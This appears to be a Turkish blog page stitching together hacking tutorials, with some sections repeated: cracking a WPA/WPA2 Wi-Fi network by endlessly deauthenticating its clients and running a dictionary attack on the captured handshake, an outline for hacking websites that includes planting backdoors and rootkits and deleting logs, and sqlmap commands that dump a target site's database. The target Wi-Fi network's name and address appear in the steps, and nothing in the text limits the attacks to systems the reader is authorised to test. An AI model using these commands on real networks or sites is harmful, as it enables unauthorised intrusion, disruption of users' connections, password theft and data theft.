Bugün İse Sizlere Yine Kali Linux Üzerinde Şifreleme Türü Wpa Wpa2 Olan Wireless Ağlarinin Şifresini Kirmayi Göstericem (Elimden Geldiği Kadariyla).
Her Ne Kadar Karmaşik İçinden Çıkılmaz Gibi Görünsede Buradaki Adimlari Tek Tek Uyguladiğinizda Aslında Ne Kadar Basit Oldugunu Anlayacaksiniz
İlk Olarak Kali Linux'da Terminalimizi Açıyoruz. 1. Adim : "airmon-ng "

2. Adim : "airmon-ng start wlan0 " İle Ağ Kartimizi Aktif Hale Getiriyoruz.

3. Adim : " airodump-ng --encrypt wpa mon0 " Bu Komutumuz İle Handshake Yakalamaya Bi Adim Atmiş Bulunuyoruz.


4. Adim : Buradan Kendimize Sinyal Gücü İyi Olan Bi Hedef Seçiyoruz Bssid Adresini Ve CH (Yayin Yaptiği Kanal Numarasi) Aliyoruz. Bizim Hedefimiz SUPERONLINE_Wi-Fi_4002 (: Bssid : 18:28:61.3F:69:0F CH : 11

5. Adim : " airodump-ng -w wpahack --encrypt wpa -c 11 --bssid 18:28:61:3F:69:0F mon0 " Buradaki "Wpahack" Olusacak Cap. Dosyamizin Adi Bunu Değiştirebilirsiniz Modem İsmi Yada Herhangi Bişi Yazabilirsiniz.

6. Adim : Hedef Ağımiza Bağli Bir Bilgisayarin Bilgilerini (Station) Aldiktan Sonra.. Yeni Konsol Açip :

7. Adim : Yeni Konsolda " aireplay-ng -0 0 -a (bssid) -c (station) mon0 " Bssid Yazan Yere Modemin Mac Adresini Station Kismina İse Ağa Bağlı Olan Bilgisayarin Mac Adresini Yaziyoruz. Resimde Gözükyor. Bu Komut İle Hedef Ağımıza Bağlı Olan Clienti -0 0 (DeAuth)Komutu İle Ağdan Düşmesi İçin Sonsuz Bir Döngü Yaratiyoruz. Resimdeki Gibi Hata Alirsaniz Sonuna --ignore Ekleyiniz.

8. Adim : Yukarida Gördüğümüz Gibi Hedefteki Ağa Bağlı Bilgisayari Ağdan Düşürüp Tekrar Bağlanmasini Bekledik Ve Handshake Yakalama Olayimiz Gerçekleşti. Yani Bunun Mantiği Şöyle Ağdaki Bilgisayarin Bağlantisini Kesip Tekrar Bağlanmasini Sağliyor Ve Bizde Bu Sirada Hanshake Yakalamiş Oluyoruz.

9. Adim : Evet Handshakemizi Yakaladik. Yakaladiğimiz Handshake Başlangıç Klasöründe Bi Bakalim Duruyor Mu
[/COLOR]

10. Adim : Şimdi Geçelim Sözlük Saldirimiza. Yeni Terminal Açiyoruz; " aircrack-ng -w /root/Destkop/pass.txt wpahack-01.cap " yaziyoruz, Ve Şifre Kirma İşlemimiz Başlıyor Wordlistiniz Ne Kadar Sağlam (Harf Rakam Özel Karakter gibi)Olursa Kirma İşlemimiz Kisa Sürede Bitecektir. Wordlistiniz Yok İse Buradaki Konumu İnceliyerek Wordlist Hazirliyabilirsiniz.

Ve Key Found : aaaaabbbbb

Şifremizi Kontrol Edelim Bağlanicakmi

Faydali Olmasi Dileğimle ...
Wordlistle Uğraşmak İstemeyen WPS Yada Linset (Evil Twin Attack) Açıklarını Deneyebilir. Linsetin Mantıgıda Söyle Hedef Ağı Klonluyor Baglantısını Kesıyor Sizin Klonladıgınız Ağa Bağlanmasını Sağlıyor Giriş Yaptıgında Şifresi Ekranınıza Düşüyor. İlgili Konu : Linset Wifi Hack WifiSlax Üzerinde Kullanıldı Linset Dilerseniz Kali Linux Üzerindede Kurup Kullanabilirsiniz.
Emeğe Saygı Teşekkürler Butonuna Basmak Zor Değil.
kali linux eğitim siteye mail çekmek:
Her Ne Kadar Karmaşik İçinden Çıkılmaz Gibi Görünsede Buradaki Adimlari Tek Tek Uyguladiğinizda Aslında Ne Kadar Basit Oldugunu Anlayacaksiniz
İlk Olarak Kali Linux'da Terminalimizi Açıyoruz. 1. Adim : "airmon-ng "
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |

2. Adim : "airmon-ng start wlan0 " İle Ağ Kartimizi Aktif Hale Getiriyoruz.
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |

3. Adim : " airodump-ng --encrypt wpa mon0 " Bu Komutumuz İle Handshake Yakalamaya Bi Adim Atmiş Bulunuyoruz.
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |

4. Adim : Buradan Kendimize Sinyal Gücü İyi Olan Bi Hedef Seçiyoruz Bssid Adresini Ve CH (Yayin Yaptiği Kanal Numarasi) Aliyoruz. Bizim Hedefimiz SUPERONLINE_Wi-Fi_4002 (: Bssid : 18:28:61.3F:69:0F CH : 11
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |

5. Adim : " airodump-ng -w wpahack --encrypt wpa -c 11 --bssid 18:28:61:3F:69:0F mon0 " Buradaki "Wpahack" Olusacak Cap. Dosyamizin Adi Bunu Değiştirebilirsiniz Modem İsmi Yada Herhangi Bişi Yazabilirsiniz.
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |

6. Adim : Hedef Ağımiza Bağli Bir Bilgisayarin Bilgilerini (Station) Aldiktan Sonra.. Yeni Konsol Açip :
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |

7. Adim : Yeni Konsolda " aireplay-ng -0 0 -a (bssid) -c (station) mon0 " Bssid Yazan Yere Modemin Mac Adresini Station Kismina İse Ağa Bağlı Olan Bilgisayarin Mac Adresini Yaziyoruz. Resimde Gözükyor. Bu Komut İle Hedef Ağımıza Bağlı Olan Clienti -0 0 (DeAuth)Komutu İle Ağdan Düşmesi İçin Sonsuz Bir Döngü Yaratiyoruz. Resimdeki Gibi Hata Alirsaniz Sonuna --ignore Ekleyiniz.
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |

8. Adim : Yukarida Gördüğümüz Gibi Hedefteki Ağa Bağlı Bilgisayari Ağdan Düşürüp Tekrar Bağlanmasini Bekledik Ve Handshake Yakalama Olayimiz Gerçekleşti. Yani Bunun Mantiği Şöyle Ağdaki Bilgisayarin Bağlantisini Kesip Tekrar Bağlanmasini Sağliyor Ve Bizde Bu Sirada Hanshake Yakalamiş Oluyoruz.
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |

9. Adim : Evet Handshakemizi Yakaladik. Yakaladiğimiz Handshake Başlangıç Klasöründe Bi Bakalim Duruyor Mu
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |

10. Adim : Şimdi Geçelim Sözlük Saldirimiza. Yeni Terminal Açiyoruz; " aircrack-ng -w /root/Destkop/pass.txt wpahack-01.cap " yaziyoruz, Ve Şifre Kirma İşlemimiz Başlıyor Wordlistiniz Ne Kadar Sağlam (Harf Rakam Özel Karakter gibi)Olursa Kirma İşlemimiz Kisa Sürede Bitecektir. Wordlistiniz Yok İse Buradaki Konumu İnceliyerek Wordlist Hazirliyabilirsiniz.
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |

Ve Key Found : aaaaabbbbb
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |

Şifremizi Kontrol Edelim Bağlanicakmi
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın. |

Faydali Olmasi Dileğimle ...
Wordlistle Uğraşmak İstemeyen WPS Yada Linset (Evil Twin Attack) Açıklarını Deneyebilir. Linsetin Mantıgıda Söyle Hedef Ağı Klonluyor Baglantısını Kesıyor Sizin Klonladıgınız Ağa Bağlanmasını Sağlıyor Giriş Yaptıgında Şifresi Ekranınıza Düşüyor. İlgili Konu : Linset Wifi Hack WifiSlax Üzerinde Kullanıldı Linset Dilerseniz Kali Linux Üzerindede Kurup Kullanabilirsiniz.
Emeğe Saygı Teşekkürler Butonuna Basmak Zor Değil.
kali linux eğitim siteye mail çekmek:
Kali Linux ile Hedef Website Hack.Merhaba arkadaşlar kali linux ile website nasıl hacklenir sorularına cevap olur umarım.
Yararlı olması için HER İNCE DETAYI İLE okuyunuz.Başlıyoruz...
Öncelikle kendimize bir senaryo çizmemiz lazım. Bu yol üzerinde gideceğiz.
Sızma Testleri Senaryosu
----------------------------------
1- Bilgi Toplama : Bu aşamada sitenin hangi dil ile yazıldığı (php,html vb.) hangi veritabanına sahip olduğu (mysql vb.) öğrenilir.
2- Ağ Haritalama : Ağın haritasını , Ağdaki çalışan bilgisayarları ve onların işletim sistemleri öğrenilir.
3- Zayıflık Tarama : Sistemin açıklarını (bug)'larını tarama.
4- Sisteme Sızma "Exploit çalıştırmak"
5- Yetki Yükseltme
6- Başka Ağlara Sızma
7- Erişimleri Koruma
8- İzleri Temizleme
9- Raporlama
Bu aşamalar için kullanılacak araçlar , programlar:
1- Bilgi Toplama
------------------------
Araç 1 - Arama Motoru
Açıklama:
Sisteme ait Google’a düşmüş urlleri belirlemeye çalışır.
Kullanımı:
Kod:
site:hedef.com filetype:php site:hedef.com filetype:asp site:hedef.com filetype:aspx site:hedef.com filetype:php admin site:hedef.com filetype:php login
Açıklama:
Whois bilgileri ile kayıt tarihi, admin iletişim bilgileri, ns bilgileri, dns bilgileri vb. bilgileri içermektedir.
Kullanımı:
Kod:
# whois hedef.com
Açıklama:
Nslookup ile domain ip aralığını araştırır.
Kullanımı:
Kod:
# nslookup hedef.com
Açıklama:
Hedef sunucu veya site dnsleri hakkında bilgi verir.
Kullanımı:
Kod:
# dnsenum –dnsserver hedef.com
Açıklama:
Hedef sunucu veya sitede port tarar servislerini görüntüler ve url dizin tarayabilir. Port tarama ve servis belirlemede Nmap aracını kullanır.
Kullanımı : Bu Kali Linux Tools ile birlikte gelir... Açmak için
Kod:
“Application” – “Kali Linux” – “Web Applications” – “Web Vulnerability Scanners” – “webshag-gui”
Açıklama:
Hedef site hazır bir script kullanıyorsa script adını ve sürümü hakkında bilgi verir.
Kullanımı:
Kod:
# whatweb hedef.com # whatweb –a 3 hedef.com
Açıklama:
Hedef sitede veya sunucuda güvenlik duvarı algılama aracı. IDS/IPS araştırıcı.
Kullanımı:
Kod:
# wafw00f http://hedef.com
Açıklama:
Alt domainlerin bulunması için kullanılır.
Kullanımı:
Kod:
# fierce –dnsserver http://hedef.com –range –file /root/sonuc.txt
Açıklama:
Subdomain e-posta adreslerinin bulunmasında kullanılır.
Kullanımı:
Kod:
# theharvester –d http://hedef.com –l 1000 –b google
Açıklama:
Hedef sunucu veya site hakkında bilgi verir.
Kullanımı:
Kod:
# Dmitry –i –w –n –s –e –p –f –b –t 0-9 http://hedef.com
Açıklama:
Sitenin alternatif alan adlarını belirler.
Kullanımı:
Kod:
# urlcrayz –k QWERTY -r http://hedef.com
Açıklama:
Gelişmiş ve kapsamlı bilgi toplama aracı.
Kullanımı:
Kod:
“Applications” – “Kali Linux” – “Top 10 Security Tools” – “maltego” gui arayüz programı.
Açıklama:
Site klasörlerini dizinlerini bulmaya yarar. Wordlist veya brute force ataklarıysa tarama yapabilir.
Kullanımı:
Kod:
“Applications” – “Kali Linux” – “Web Applications” – “Web Crawlers” – “dirbuster” gui arayüz programı.
Açıklama:
Site klasörlerini dizinlerini bulmaya yarar. Wordlist veya brute force ataklarıysa tarama yapabilir.
Kullanımı:
Kod:
# dirb http://192.168.1.2/ /usr/share/sqlmap/txt/smalldict.txt
Açıklama:
Hashlı olan şifrenin/parolanın şifreleme türünü belirler.
Kullanımı:
Kod:
# “Applications” – “Kali Linux” – “Password Attacks” – “Offline Attacks” – “hash-identifier” konsol aracı.
---------------------------
Araç 1 – Tcptraceroute
Açıklama:
Hedef sisteme giden yol haritasını çıkarır.
Kullanımı:
Kod:
# tcptraceroute http://hedef.com 80
Açıklama:
Nmap taranan ağın haritasını çıkarabilir, ağ makinalarındaki çalışan servisleri, işletim sistemini, portların durumlarını, güvenlik duvarlarını belirleyebilir ve zafiyet taraması yapabilen bir araçtır.
Kullanımı:
Kod:
# nmap –sS 192.168.1.2 –O –vv # nmap –A –vv 192.168.1.2 –sS parametresi SYN SCAN taraması yapar. -A, OS ve versiyon bulma, script taraması ve traceroute özelliğini çalıştırır. -O parametresi işletim sistemi belirler. -vv parametresi ise çıktıyı sadeleştirir. Ve bir çok parametre ile tarama işlemi mevcuttur.
Açıklama:
Hedef sitede veya sunucuda güvenlik duvarı algılama aracı. IDS/IPS araştırıcı.
Kullanımı:
Kod:
# wafw00f http://hedef.com
------------------
Araç 1 – Nessus
_
Araç 2 – w3af
_
Araç 3 – OWASP Zap
_
Araç 4 – uniscan
Kullanımı:
Kod:
# uniscan –u http:/192.168.1.2/ -qweds
4- Sisteme Sızma "Exploit çalıştırmak"
---------------------------------------
Araç 1 – m.e.t.a.sploit
Araç 2 – Sqlmap
Araç 3 – Fimap
5- Yetki Yükseltme
-------------------
Bu adımda sistemdeki kullanıcının haklarını yetkilerini yükseltmek hedeflenmektedir. Sistemdeki kullanıcıların, haklarının belirlenmesi ve parolasız hesapların belirlenmesi, parolaya sahip hesapların ise araçlarla parolaların kırılması gerekir. Tüm sistemi kontrol edebilmek için (root, administrator veya system) olmak gerekir.
6- Başka Ağlara Sızma
---------------------------
Erişim sahibi olduğumuz sistemde yetki elde etmişsek, başka şifreli kullanıcıların bilgilerini almak için sızdığımız sistemde sniffer çalıştırabilir ve kullanıcı/sistem bilgilerini elde edebilir mümkünse rhost, ssh dosyalarına, eski komutlara bakarak nerelere erişilebiliyor bakılabilir.
7- Erişimleri Koruma
------------------------
Sisteme girdiğimizi başkaları tarafından fark edilmemesi için önlemler almalıyız varsa log programlarının verileri silinmesi, giriş loglarının silinmesi, çalıştırdığımız programların, servislerin saklı olması gerek veya uzaktan erişim sağlamak için backdoor, rootkit yerleştirilebilir ve daha sonra tekrar bağlanılabilir ama bu işlem biraz riskli olabilir.
8- İzleri Temizleme
-----------------------
Hedef sistemde bıraktığımız backdoor, rootkit, keylogger, trojan, scriptler, eklenmiş veriler notlar vb.. işlemler test bitiminde silinmelidir.
9- Raporlama
------------------
Her adımı kayıt altında tutmak bilgi ve notlar almak teknik detayları eklemek test bitiminde güvenliği sağlamlaştırmak açısından faydalı olacaktır ve başka bir pentest çalışmalarınızda tekrar fayda sağlayacaktır.
Kali Linux || Sqlmap
Linux
Merhaba arkadaşlar. Bugün sizlere sqlmap´i tam ayrıntılarıyla anlatmadan, sadece sql injection kısmını anlatacağım. Dilerseniz başlayalım. Ben bu uygulamayı Kali Linux üzerinden göstereceğim.
Öncelikle Applications > Kali Linux > Top 10 Security Tools > Sqlmap veya Terminal > Sqlmap yollarından biri ile arayüzümüzü açalım. Hedef sitemizde Sql Açığının olması gerekiyor. Bu açığın olup olmadığını Acunetix veya Linux için Powerfuzzer ile öğrenebilirsiniz. Daha sonra bu kodu yazalım: (Ekran Resmi: http://i.hizliresim.com/PY1nD8.png )
Kod: sqlmap -u www.hedefsite.com --dbs
Bu kod ile hedef sitenin databasesini çekmiş olacağız. Bu adımdan sonra Database´nin alt dallarını, yani Tables´ı çekmemiz lazım. Sıradaki kodumuz:
Kod: sqlmap -u www.hedefsite.com -D (database) --tables
Bu kod ile hedef sitenin Tables kısmını öğrenmiş olacağız. "(database)" kısmına çıkan en uygun database´nin adını yazacağız. Daha sonraki kodumuz, sütunlar, yani Columns´ları öğrenmemizi sağlayacak.
Kod: sqlmap -u www.hedefsite.com -D (database) -T (table) --columns
"(table)" kısmına önceki adımda karşımıza çıkan en uygun Table´ın adını yazacağız. Bir sonraki kodumuz ile karşımıza çıkan en uygun Column´un adını (column) halinde göstereceğim. Şimdiki kodumuz:
Kod: sqlmap -u www.hedefsite.com -D (database) -T (table) -C (column) --dump
--dump komutu, sitedeki verileri çekmemizi sağlar. Bu adımları uyguladıktan sonra SQL Injection işlemimiz tamamlanmış olacaktır. Bir teşekkürü çok görmeyin anlatım tamamiyle bana aittir
Öncelikle Applications > Kali Linux > Top 10 Security Tools > Sqlmap veya Terminal > Sqlmap yollarından biri ile arayüzümüzü açalım. Hedef sitemizde Sql Açığının olması gerekiyor. Bu açığın olup olmadığını Acunetix veya Linux için Powerfuzzer ile öğrenebilirsiniz. Daha sonra bu kodu yazalım: (Ekran Resmi: http://i.hizliresim.com/PY1nD8.png )
Kod: sqlmap -u www.hedefsite.com --dbs
Bu kod ile hedef sitenin databasesini çekmiş olacağız. Bu adımdan sonra Database´nin alt dallarını, yani Tables´ı çekmemiz lazım. Sıradaki kodumuz:
Kod: sqlmap -u www.hedefsite.com -D (database) --tables
Bu kod ile hedef sitenin Tables kısmını öğrenmiş olacağız. "(database)" kısmına çıkan en uygun database´nin adını yazacağız. Daha sonraki kodumuz, sütunlar, yani Columns´ları öğrenmemizi sağlayacak.
Kod: sqlmap -u www.hedefsite.com -D (database) -T (table) --columns
"(table)" kısmına önceki adımda karşımıza çıkan en uygun Table´ın adını yazacağız. Bir sonraki kodumuz ile karşımıza çıkan en uygun Column´un adını (column) halinde göstereceğim. Şimdiki kodumuz:
Kod: sqlmap -u www.hedefsite.com -D (database) -T (table) -C (column) --dump
--dump komutu, sitedeki verileri çekmemizi sağlar. Bu adımları uyguladıktan sonra SQL Injection işlemimiz tamamlanmış olacaktır. Bir teşekkürü çok görmeyin anlatım tamamiyle bana aittir
Hiç yorum yok:
Yorum Gönder